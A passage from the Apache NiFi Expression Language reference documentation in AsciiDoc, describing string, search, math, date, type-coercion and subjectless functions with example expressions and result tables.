than\n\t1 megabyte (1048576 bytes). Otherwise, it will return `false`.\n\n\n\n\n[.function]\n=== le\n*Description*: [.description]#The `le` function is used for numeric comparison and returns `true` if the subject is Less Than \n\tOr Equal To its argument. If either the subject or the argument cannot be coerced into a Number, \n\tthis function returns `false`.#\n\n*Subject Type*: [.subject]#Number#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The number to compare the Subject to.#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: `${fileSize:le( 1048576 )}` will return `true` if the size of the FlowFile's content is at most\n\t(less than or equal to) 1 megabyte (1048576 bytes). Otherwise, it will return `false`.\n\n\n\n\n\n\n[.function]\n=== and\n*Description*: [.description]#The `and` function takes as a single argument a Boolean value and returns `true` if both the Subject\n\tand the argument are `true`. If either the subject or the argument is `false` or cannot be coerced into a Boolean,\n\tthe function returns `false`. Typically, this is used with an embedded Expression as the argument.#\n\n*Subject Type*: [.subject]#Boolean#\n\n*Arguments*:\n\n\t- [.argName]#_condition_# : [.argDesc]#The right-hand-side of the 'and' Expression#\n\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: We can check if the filename is both all lower-case and has at least 5 characters by using the Expression\n-----------------------------------------------\n${filename:toLower():equals( ${filename} ):and(\n\t${filename:length():ge(5)}\n)}\n-----------------------------------------------\n\n\n\n\n\n[.function]\n=== or\n\n*Description*: [.description]#The `or` function takes as a single argument a Boolean value and returns `true` if either the Subject\n\tor the argument is `true`. If both the subject and the argument are `false`, the function returns `false`. If\n\teither the Subject or the argument cannot be coerced into a Boolean value, this function will return `false`.#\n\n*Subject Type*: [.subject]#Boolean#\n\n*Arguments*:\n\n\t- [.argName]#_condition_# : [.argDesc]#The right-hand-side of the 'and' Expression#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: The following example will return `true` if either the filename has exactly 5 characters or if\n\tthe filename is all lower-case.\n----------------------------------------------\n${filename:toLower():equals( ${filename} ):or(\n\t${filename:length():equals(5)}\n)}\n----------------------------------------------\n\n\n\n[.function]\n=== not\n\n[.description]\n*Description*: [.description]#The `not` function returns the negation of the Boolean value of the subject.#\n\n[.subject]\n*Subject Type*: [.subject]#Boolean#\n\n[.arguments]\n*Arguments*: No arguments\n\n[.returnType]\n*Return Type*: [.returnType]#Boolean#\n\n[.examples]\n*Examples*: We can invert the value of another function by using the `not` function, as \n\t`${filename:equals('hello.txt'):not()}`. This will return `true` if the filename is NOT equal to\n\t\"hello.txt\" and will return `false` if the filename is \"hello.txt.\"\n\n\n\n\n\n\n\n[[strings]]\n== String Manipulation\n\nEach of the following functions manipulates a String in some way.\n\n\n\n\n[.function]\n=== toUpper\n\n*Description*: [.description]#This function converts the Subject into an all upper-case String. Said another way, it\n\treplaces any lowercase letter with the uppercase equivalent.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute is \"abc123.txt\", then the Expression `${filename:toUpper()}` \n\twill return \"ABC123.TXT\"\n\n\n\n\n\n[.function]\n=== toLower\n\n*Description*: [.description]#This function converts the Subject into an all lower-case String. Said another way,\n\tit replaces any uppercase letter with the lowercase equivalent.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute is \"ABC123.TXT\", then the Expression `${filename:toLower()}`\n\twill return \"abc123.txt\"\n\n\n\n\n\n[.function]\n=== trim\n\n*Description*: [.description]#The `trim` function will remove any leading or trailing white space from its subject.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the attribute `attr` has the value \" 1 2 3 \", then the Expression `${attr:trim()}` will\n\treturn the value \"1 2 3\".\n\n\n\n\n\n[.function]\n=== urlEncode\n\n*Description*: [.description]#Returns a URL-friendly version of the Subject. This is useful, for instance, when using an\n\tattribute value to indicate the URL of a website.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: We can URL-Encode an attribute named \"url\" by using the Expression `${url:urlEncode()}`. If\n\tthe value of the \"url\" attribute is \"https:\/\/nifi.incubator.apache.org\/some value with spaces\", this\n\tExpression will then return \"https:\/\/nifi.incubator.apache.org\/some%20value%20with%20spaces\".\n\n\n\n\n[.function]\n=== urlDecode\n\n*Description*: [.description]#Converts a URL-friendly version of the Subject into a human-readable form.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If we have a URL-Encoded attribute named \"url\" with the value \n\t\"https:\/\/nifi.incubator.apache.org\/some%20value%20with%20spaces\", then the Expression\n\t`${url:urlDecode()}` will return \"https:\/\/nifi.incubator.apache.org\/some value with spaces\".\n\n\n\n\n\n[.function]\n=== substring\n\n*Description*: \n[.description]#Returns a portion of the Subject, given a _starting index_ and an optional _ending index_.\n\tIf the _ending index_ is not supplied, it will return the portion of the Subject starting at the given\n\t'start index' and ending at the end of the Subject value.#\n\n[.description]#The _starting index_ and _ending index_ are zero-based. That is, the first character is referenced by using\n\tthe value `0`, not `1`.#\n\n[.description]#If either the _starting index_ is or the _ending index_ is not a number, this function call will result\n\tin an error.#\n\n[.description]#If the _starting index_ is larger than the _ending index_, this function call will result in an error.#\n\n[.description]#If the _starting index_ or the _ending index_ is greater than the length of the Subject or has a value\n\tless than 0, this function call will result in an error.#\n\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: \n\n\t- [.argName]#_starting index_# : [.argDesc]#The 0-based index of the first character to capture (inclusive)#\n\t- [.argName]#_ending index_# : [.argDesc]#The 0-based index of the last character to capture (exclusive)#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: \n\nIf we have an attribute named \"filename\" with the value \"a brand new filename.txt\",\nthen the following Expressions will result in the following values:\n\n.Substring Examples\n|================================================================\n| Expression | Value\n| `${filename:substring(0,1)}` | `a`\n| `${filename:substring(2)}` | `brand new filename.txt`\n| `${filename:substring(12)}` | `filename.txt`\n| `${filename:substring( ${filename:length():minus(2)} )}` | `xt`\n|================================================================\n\n\n\n\n[.function]\n=== substringBefore\n\n*Description*: [.description]#Returns a portion of the Subject, starting with the first character of the Subject\n\tand ending with the character immediately before the first occurrence of the argument. If\n\tthe argument is not present in the Subject, the entire Subject will be returned.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The String to search for in the Subject#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\",\n\tthen the following Expressions will result in the following values:\n\t\n.SubstringBefore Examples\n|======================================================================\n| Expression | Value\n| `${filename:substringBefore('.')}` | `a brand new filename`\n| `${filename:substringBefore(' ')}` | `a`\n| `${filename:substringBefore(' n')}` | `a brand`\n| `${filename:sbustringBefore('missing')}` | `a brand new filename.txt`\n|======================================================================\n\n\n\n\n\n[.function]\n=== substringBeforeLast\n\n*Description*: [.description]#Returns a portion of the Subject, starting with the first character of the Subject\n\tand ending with the character immediately before the last occurrence of the argument. If\n\tthe argument is not present in the Subject, the entire Subject will be returned.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The String to search for in the Subject#\n\n*Return Type*: [.returnType]#String3\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\",\n\tthen the following Expressions will result in the following values:\n\t\n.SubstringBeforeLast Examples\n|==========================================================================\n| Expression | Value\n| `${filename:substringBeforeLast('.')}` | `a brand new filename`\n| `${filename:substringBeforeLast(' ')}` | `a brand new`\n| `${filename:substringBeforeLast(' n')}` | `a brand`\n| `${filename:substringBeforeLast('missing')}` | `a brand new filename.txt`\n|==========================================================================\n\n\n\n\n\n\n[.function]\n=== substringAfter\n\n*Description*: [.description]#Returns a portion of the Subject, starting with the character immediately after\n\tthe first occurrence of the argument and extending to the end of the Subject. If\n\tthe argument is not present in the Subject, the entire Subject will be returned.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The String to search for in the Subject#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\",\n\tthen the following Expressions will result in the following values:\n\t\n.SubstringAfter Examples\n|======================================================================\n| Expression | Value\n| `${filename:substringAfter('.')}` | `txt`\n| `${filename:substringAfter(' ')}` | `brand new filename.txt`\n| `${filename:substringAfter(' n')}` | `ew filename.txt`\n| `${filename:substringAfter('missing')}` | `a brand new filename.txt`\n|======================================================================\n\n\n\n\n\n[.function]\n=== substringAfterLast\n\n*Description*: [.description]#Returns a portion of the Subject, starting with the character immediately after\n\tthe last occurrence of the argument and extending to the end of the Subject. If\n\tthe argument is not present in the Subject, the entire Subject will be returned.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The String to search for in the Subject#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\",\n\tthen the following Expressions will result in the following values:\n\t\n.SubstringAfterLast Examples\n|=========================================================================\n| Expression | Value\n| `${filename:substringAfterLast('.')}` | `txt`\n| `${filename:substringAfterLast(' ')}` | `filename.txt`\n| `${filename:substringAfterLast(' n')}` | `ew filename.txt`\n| `${filename:substringAfterLast('missing')}` | `a brand new filename.txt`\n|=========================================================================\n\n\n\n\n\n\n\n[.function]\n=== append\n\n*Description*: [.description]#The `append` function returns the result of appending the argument to the value of\n\tthe Subject. If the Subject is null, returns the argument itself.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The String to append to the end of the Subject#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", then the Expression\n\t`${filename:append('.gz')}` will return \"a brand new filename.txt.gz\".\n\n\n\n\n\n[.function]\n=== prepend\n\n*Description*: [.description]#The `prepend` function returns the result of prepending the argument to the value of\n\tthe Subject. If the subject is null, returns the argument itself.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The String to prepend to the beginning of the Subject#\n\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"filename.txt\", then the Expression\n\t`${filename:prepend('a brand new ')}` will return \"a brand new filename.txt\".\n\n\n\n\n\n[.function]\n=== replace\n\n*Description*: [.description]#Replaces occurrences of one String within the Subject with another String.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_Search String_# : [.argDesc]#The String to find within the Subject#\n\t- [.argName]#_Replacement_# : [.argDesc]#The value to replace _Search String_ with#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", then the following\nExpressions will provide the following results:\n\n\n\n.Replace Examples\n|===================================================================\n| Expression | Value\n| `${filename:replace('.', '_')}` | `a brand new filename_txt`\n| `${filename:replace(' ', '.')}` | `a.brand.new.filename.txt`\n| `${filename:replace('XYZ', 'ZZZ')}` | `a brand new filename.txt`\n| `${filename:replace('filename', 'book')}` | `a brand new book.txt`\n|===================================================================\n\n\n\n\n\n[.function]\n=== replaceAll\n\n*Description*: [.description]#The `replaceAll` function takes two String arguments: a Regular Expression (NiFi uses the Java Pattern\n\tsyntax), and a replacement string. The return value is the result of substituting the replacement string for\n\tall patterns within the Subject that match the Regular Expression.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n*Arguments*:\n\n\t- [.argName]#_Regex_# : [.argDesc]#he Regular Expression (in Java syntax) to match in the Subject#\n\t- [.argName]#_Replacement_# : [.argDesc]#The value to use for replacing matches in the Subject. If the _regular expression_\n\t\targument uses Capturing Groups, back references are allowed in the _replacement_.#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", then the following\nExpressions will provide the following results:\n\n\n\n.replaceAll Examples\n|=======================================================================================\n| Expression | Value\n| `${filename:replaceAll('\\..*', '')}` | `a brand new filename`\n| `${filename:replaceAll('a brand (new)', '$1')}` | `new filename.txt`\n| `${filename:replaceAll('XYZ', 'ZZZ')}` | `a brand new filename.txt`\n| `${filename:replaceAll('brand (new)', 'somewhat $1')}` | `a somewhat new filename.txt`\n|=======================================================================================\n\n\n\n\n\n\n[.function]\n=== replaceNull\n\n*Description*: [.description]#The `replaceNull` function returns the argument if the Subject is null. Otherwise,\n\treturns the Subject.#\n\n*Subject Type*: [.subject]#Any#\n\n*Arguments*:\n\n\t- [.argName]#_Replacement_# : [.argDesc]#The value to return if the Subject is null.#\n\n*Return Type*: [.returnType]#Type of Subject if Subject is not null; else, type of Argument#\n\n*Examples*: If the attribute \"filename\" has the value \"a brand new filename.txt\" and the attribute\n\t\"hello\" does not exist, then the Expression `${filename:replaceNull('abc')}` will return \n\t\"a brand new filename.txt\", while `${hello:replaceNull('abc')}` will return \"abc\".\n\n\n\n\n[.function]\n=== replaceEmpty\n\n*Description*: [.description]#The `replaceEmpty` function returns the argument if the Subject is null or\n\tif the Subject consists only of white space (new line, carriage return, tab, space). Otherwise,\n\treturns the Subject.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_Replacement_# : [.argDesc]#The value to return if the Subject is null or empty.#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the attribute \"filename\" has the value \"a brand new filename.txt\" and the attribute\n\t\"hello\" has the value \" \", then the Expression `${filename:replaceEmpty('abc')}` will return \n\t\"a brand new filename.txt\", while `${hello:replaceEmpty('abc')}` will return \"abc\".\n\n\n\n\n[.function]\n=== length\n\n*Description*: [.description]#Returns the length of the Subject#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: If the attribute \"filename\" has a value of \"a brand new filename.txt\" and the attribute\n\t\"hello\" does not exist, then the Expression `${filename:length()}` will return 24. `${hello:length()}`\n\twill return 0.\n\n\n\n\n\n\n\n\n[[searching]]\n== Searching\n\nEach of the following functions is used to search its subject for some value.\n\n\n[.function]\n=== startsWith\n\n*Description*: [.description]#Returns `true` if the Subject starts with the String provided as the argument,\n\t`false` otherwise.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The value to search for#\n\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", then the Expression\n\t`${filename:startsWith('a brand')}` will return `true`. `${filename:startsWith('A BRAND')}` will\n\treturn `false`. `${filename:toUpper():startsWith('A BRAND')}` returns `true`.\n\n\n\n\n\n[.function]\n=== endsWith\n\n*Description*: [.description]#Returns `true` if the Subject ends with the String provided as the argument,\n\t`false` otherwise.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The value to search for#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", then the Expression\n\t`${filename:endsWith('txt')}` will return `true`. `${filename:endsWith('TXT')}` will\n\treturn `false`. `${filename:toUpper():endsWith('TXT')}` returns `true`.\n\n\n\n\n\n[.function]\n=== contains\n\n*Description*: [.description]#Returns `true` if the Subject contains the value of the argument anywhere in the value.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The value to search for#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", then the Expression\n\t`${filename:contains('new')}` will return `true`. `${filename:contains('NEW')}` will\n\treturn `false`. `${filename:toUpper():contains('NEW')}` returns `true`.\n\n\n\n\n\n[.function]\n=== find\n\n*Description*: [.description]#Returns `true` if the Subject contains any sequence of characters that matches the\n\tRegular Expression provided by the argument.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_Regex_# : [.argDesc]#The Regular Expression (in the Java Pattern syntax) to match against the Subject#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: \n\nIf the \"filename\" attribute has the value \"a brand new filename.txt\", then the following\nExpressions will provide the following results:\n\n\n.find Examples\n|=======================================================================================\n| Expression | Value\n| `${filename:find('a [Bb]rand [Nn]ew')}` | `true`\n| `${filename:find('Brand.*')}` | `false`\n| `${filename:find('brand')}` | `true`\n|=======================================================================================\n\n\n\n\n\n[.function]\n=== matches\n\n*Description*: [.description]#Returns `true` if the Subject exactly matches the Regular Expression provided by the argument.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: \n\n\t- [.argName]#_Regex_# : [.argDesc]#The Regular Expression (in the Java Pattern syntax) to match against the Subject#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: \n\nIf the \"filename\" attribute has the value \"a brand new filename.txt\", then the following\nExpressions will provide the following results:\n\n\n.matches Examples\n|=======================================================================================\n| Expression | Value\n| `${filename:matches('a.*txt')}` | `true`\n| `${filename:matches('brand')}` | `false`\n| `${filename:matches('.+brand.+')}` | `true`\n|=======================================================================================\n\n\n\n\n[.function]\n=== indexOf\n\n*Description*: [.description]#Returns the index of the first character in the Subject that matches the String value provided\n\tas an argument. If the argument is found multiple times within the Subject, the value returned is the\n\tstarting index of the *first* occurrence.\n\tIf the argument cannot be found in the Subject, returns `-1`. The index is zero-based. This means that if\n\tthe search string is found at the beginning of the Subject, the value returned will be `0`, not `1`.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The value to search for in the Subject#\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", then the following\nExpressions will provide the following results:\n\n\n\n.indexOf Examples\n|===============================================\n| Expression | Value\n| `${filename:indexOf('a.*txt')}` | `-1`\n| `${filename:indexOf('.')}` | `20`\n| `${filename:indexOf('a')}` | `0`\n| `${filename:indexOf(' ')}` | `1`\n|===============================================\n\n\n\n\n[.function]\n=== lastIndexOf\n\n*Description*: [.description]#Returns the index of the first character in the Subject that matches the String value provided\n\tas an argument. If the argument is found multiple times within the Subject, the value returned is the\n\tstarting index of the *last* occurrence.\n\tIf the argument cannot be found in the Subject, returns `-1`. The index is zero-based. This means that if\n\tthe search string is found at the beginning of the Subject, the value returned will be `0`, not `1`.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The value to search for in the Subject#\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", then the following\nExpressions will provide the following results:\n\n.lastIndexOf Examples\n|=======================================================================================\n| Expression | Value\n| `${filename:lastIndexOf('a.*txt')}` | `-1`\n| `${filename:lastIndexOf('.')}` | `20`\n| `${filename:lastIndexOf('a')}` | `17`\n| `${filename:lastIndexOf(' ')}` | `11`\n|=======================================================================================\n\n\n\n\n[[numbers]]\n== Mathematical Operations and Numeric Manipulation\n\n\n[.function]\n=== plus\n\n*Description*: [.description]#Adds a numeric value to the Subject. If either the argument or the Subject cannot be\n\tcoerced into a Number, returns `null`.#\n\n*Subject Type*: [.subject]#Number#\n\n*Arguments*:\n\n\t- [.argName]#_Operand_# : [.argDesc]#The value to add to the Subject#\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: If the \"fileSize\" attribute has a value of 100, then the Expression `${fileSize:plus(1000)}`\n\twill return the value `1100`.\n\n\n\n\n\n[.function]\n=== minus\n\n*Description*: [.description]#Subtracts a numeric value from the Subject.#\n\n*Subject Type*: [.subject]#Number#\n\n*Arguments*:\n\n\t- [.argName]#_Operand_# : [.argDesc]#The value to subtract from the Subject#\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: If the \"fileSize\" attribute has a value of 100, then the Expression `${fileSize:minus(100)}`\n\twill return the value `0`.\n\n\n\n\n\n[.function]\n=== multiply\n\n*Description*: [.description]#Multiplies a numeric value by the Subject and returns the product.#\n\n*Subject Type*: [.subject]#Number#\n\n*Arguments*:\n\n\t- [.argName]#_Operand_# : [.argDesc]#The value to multiple the Subject by#\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: If the \"fileSize\" attribute has a value of 100, then the Expression `${fileSize:multiply(1024)}`\n\twill return the value `102400`.\n\n\n\n\n[.function]\n=== divide\n\n*Description*: [.description]#Divides a numeric value by the Subject and returns the result, rounded down to the nearest integer.#\n\n*Subject Type*: [.subject]#Number#\n\n*Arguments*:\n\n\t- [.argName]#_Operand_# : [.argDesc]#The value to add divide the Subject by#\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: If the \"fileSize\" attribute has a value of 100, then the Expression `${fileSize:divide(12)}`\n\twill return the value `8`.\n\n\n\n\n[.function]\n=== mod\n\n*Description*: [.description]#Performs a modular division of the Subject by the argument. That is, this function will divide\n\tthe Subject by the value of the argument and return not the quotient but rather the remainder.#\n\n*Subject Type*: [.subject]#Number#\n\n*Arguments*:\n\n\t- [.argName]#_Operand_# : [.argDesc]#The value to divide the Subject by#\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: If the \"fileSize\" attribute has a value of 100, then the Expression `${fileSize:mod(12)}`\n\twill return the value `4`.\n\n\n\n\n\n[.function]\n=== toRadix\n\n*Description*: [.description]#Converts the Subject from a Base 10 number to a different Radix (or number base). An optional\n\tsecond argument can be used to indicate the minimum number of characters to be used. If the converted value\n\thas fewer than this number of characters, the number will be padded with leading zeroes.#\n\n*Subject Type*: [.subject]#Number#\n\n*Arguments*:\n\n\t- [.argName]#_Desired Base_# : [.argDesc]#A Number between 2 and 36 (inclusive)#\n\t- [.argName]#_Padding_# : [.argDesc]#Optional argument that specifies the minimum number of characters in the converted output#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"fileSize\" attributes has a value of 1024, then the following Expressions will yield\n\tthe following results:\n\t\n\n.toRadix Examples\n|=======================================================================================\n| Expression | Value\n| `${fileSize:toRadix(10)}` | `1024`\n| `${fileSize:toRadix(10, 1)}` | `1024`\n| `${fileSize:toRadix(10, 8)}` | `00001024`\n| `${fileSize:toRadix(16)}` | `400`\n| `${fileSize:toRadix(16, 8)}` | `00000400`\n| `${fileSize:toRadix(2)}` | `10000000000`\n| `${fileSize:toRadix(2, 16)}` | `0000010000000000`\n|=======================================================================================\n\n\n\n\n[[dates]]\n== Date Manipulation\n\n\n\n[[format]]\n[.function]\n=== format\n\n*Description*: [.description]#Formats a number as a date\/time according to the format specified by the argument. The argument\n\tmust be a String that is a valid Java SimpleDateFormat format. The Subject is expected to be a Number that\n\trepresents the number of milliseconds since Midnight GMT January 1, 1970.#\n\n*Subject Type*: [.subject]#Number#\n\n*Arguments*:\n\n\t- [.argName]#_format_# : [.argDesc]#The format to use in the Java SimpleDateFormat syntax#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the attribute \"time\" has the value \"1420058163264\", then the following Expressions will yield\n\tthe following results:\n\t\n.format Examples\n|============================================================================\n| Expression | Value\n| `${time:format(\"yyyy\/MM\/dd HH:mm:ss.SSS'Z'\")}` | `2014\/12\/31 15:36:03.264Z`\n| `${time:format(\"yyyy\/MM\/dd\")}` | `2014\/12\/31`\n| `${time:format(\"HH:mm:ss.SSS'Z'\")}` | `15:36:03.264Z`\n| `${time:format(\"2014\")}` | `2014`\n|============================================================================\n\n\n\n\n\n[.function]\n=== toDate\n\n*Description*: [.description]#Converts a String into a Number, based on the format specified by the argument. The argument\n\tmust be a String that is a valid Java SimpleDateFormat syntax. The Subject is expected to be a String\n\tthat is formatted according the argument. The return value is the numbr of milliseconds since \n\tMidnight GMT January 1, 1979.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\t\n\t\t- [.argName]#_format_# : [.argDesc]#The current format to use when parsing the Subject, in the Java SimpleDateFormat syntax.#\n\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: If the attribute \"year\" has the value \"2014\" and the attribute \"time\" has the value \"2014\/12\/31 15:36:03.264Z\",\n\tthen the Expression `${year:toDate('yyyy')}` will return the number of milliseconds between Midnight GMT on January 1, 1970\n\tand Midnight GMT on January 1, 2014. The Expression `${time:toDate(\"yyyy\/MM\/dd HH:mm:ss.SSS'Z'\")}` will result in the\n\tnumber of milliseconds between Midnight GMT on January 1, 1970 and 15:36:03.264 GMT on December 31, 2014.\n\t\n\tOften, this function is used in conjunction with the <<format>> function to change the format of a date\/time. For example,\n\tif the attribute \"date\" has the value \"12-24-2014\" and we want to change the format to \"2014\/12\/24\", we can do so by\n\tchaining together the two functions: `${date:toDate('MM-dd-yyyy'):format('yyyy\/MM\/dd')}`.\n\n\n\n\n[.function]\n=== now\n\n*Description*: [.description]#The `now` function returns the current date and time as the number of milliseconds since Midnight GMT on\n\tJanuary 1, 1970.#\n\n*Subject Type*: [.subject]#No Subject#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: We can format the current date and time by using the `now` function in conjunction with the <<format>> function:\n\t`${now():format('yyyy\/MM\/dd HH:mm:ss')}`.\n\n\n\n\n\n[[type_cast]]\n== Type Coercion\n\n[.function]\n=== toString\n\n*Description*: [.description]#Coerces the Subject into a String#\n\n*Subject Type*: [.subject]#Any type#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: The Expression `${fileSize:toNumber():toString()}` converts the value of \"fileSize\" attribute to a number and\n\tback to a String.\n\n\n\n\n\n[.function]\n=== toNumber\n\n*Description*: [.description]#Coerces the Subject into a Number#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: The Expression `${fileSize:toNumber()}` converts the String attribute value of \"fileSize\" to a number.\n\n\n\n\n\n\n[[subjectless]]\n== Subjectless Functions\n\nWhile the majority of functions in the Expression Language are called by using the syntax\n`${attributeName:function()}`, there exist a few functions that are not expected to have subjects.\nIn this case, the attribute name is not present. For example, the IP address of the machine can\nbe obtained by using the Expression `${ip()}`. All of the functions in this section are to be called\nwithout a subject. Attempting to call a subjectless function and provide it a subject will result in\nan error when validating the function.\n\n\n[.function]\n=== ip\n\n*Description*: [.description]#Returns the IP address of the machine.#\n\n*Subject Type*: [.subjectless]#No subject#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: The IP address of the machine can be obtained by using the Expresison `${ip()}`.\n\n\n\n\n\n[.function]\n=== hostname\n\n*Description*: [.description]#Returns the Hostname of the machine. An optional argument of type Boolean can be provided\n\tto specify whether or not the Fully Qualified Domain Name should be used. If `false`, or not specified,\n\tthe hostname will not be fully qualified. If the argument is `true` but the fully qualified hostname\n\tcannot be resolved, the simple hostname will be returned.#\n\n*Subject Type*: [.subjectless]#No subject#\n\n*Arguments*:\n\n\t- [.argName]#_Fully Qualified_# : [.argDesc]#Optional parameter that specifies whether or not the hostname should be\n\t\tfully qualified. If not specified, defaults to false.#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: The fully qualified hostname of the machine can be obtained by using the Expression `${hostname(true)}`,\n\twhile the simple hostname can be obtained by using either `${hostname(false)}` or simply `${hostname()}`.\n\n\n\n\n\n[.function]\n=== UUID\n\n*Description*: [.description]#Returns a randomly generated UUID.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: ${UUID()} returns a value similar to de305d54-75b4-431b-adb2-eb6b9e546013\n\n\n\n\n\n[.function]\n=== nextInt\n\n*Description*: [.description]#Returns a one-up value (starting at 0) and increasing over the lifetime of the running instance of NiFi. \n\tThis value is not persisted across restarts and is not guaranteed to be unique across a cluster. \n\tThis value is considered \"one-up\" in that if called multiple times across the NiFi instance, the values will be sequential. \n\tHowever, this counter is shared across all NiFi components, so calling this function multiple times from one Processor will \n\tnot guarantee sequential values within the context of a particular Processor.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: If the previous value returned by `nextInt` was `5`, the Expression `${nextInt():divide(2)}` obtains the next available \n\tinteger (6) and divides the result by 2, returning a value of `3`.\n\n\n\n\n\n\n[[multi]]\n== Evaluating Multiple Attributes\n\nWhen it becomes necessary to evaluate the same conditions against multiple attributes, this can be accomplished by means of the \n`and` and `or` functions. However, this quickly becomes tedious, error-prone, and difficult to maintain. For this reason, NiFi\nprovides several functions for evaluating the same conditions against groups of attributes at the same time.\n\n\n\n\n[.function]\n=== anyAttribute\n \n*Description*: [.description]#Checks to see if any of the given attributes, match the given condition. This function has no subject and takes one or more\n\targuments that are the names of attributes to which the remainder of the Expression is to be applied. If any of the attributes specified,\n\twhen evaluated against the rest of the Expression, returns a value of `true`, then this function will return `true`. Otherwise, this function\n\twill return `false`.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n*Arguments*:\n\n\t- [.argName]#_Attribute Names_# : [.argDesc]#One or more attribute names to evaluate#\n\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: Given that the \"abc\" attribute contains the value \"hello world\", \"xyz\" contains \"good bye world\", \n\tand \"filename\" contains \"file.txt\" consider the following examples:\n\n.anyAttribute Examples\n|=======================================================================\n| Expression | Value\n| `${anyAttribute(\"abc\", \"xyz\"):contains(\"bye\")}` | `true`\n| `${anyAttribute(\"filename\",\"xyz\"):toUpper():contains(\"e\")}` | `false`\n|=======================================================================\n\n\n\n\n[.function]\n=== allAttributes\n\n*Description*: 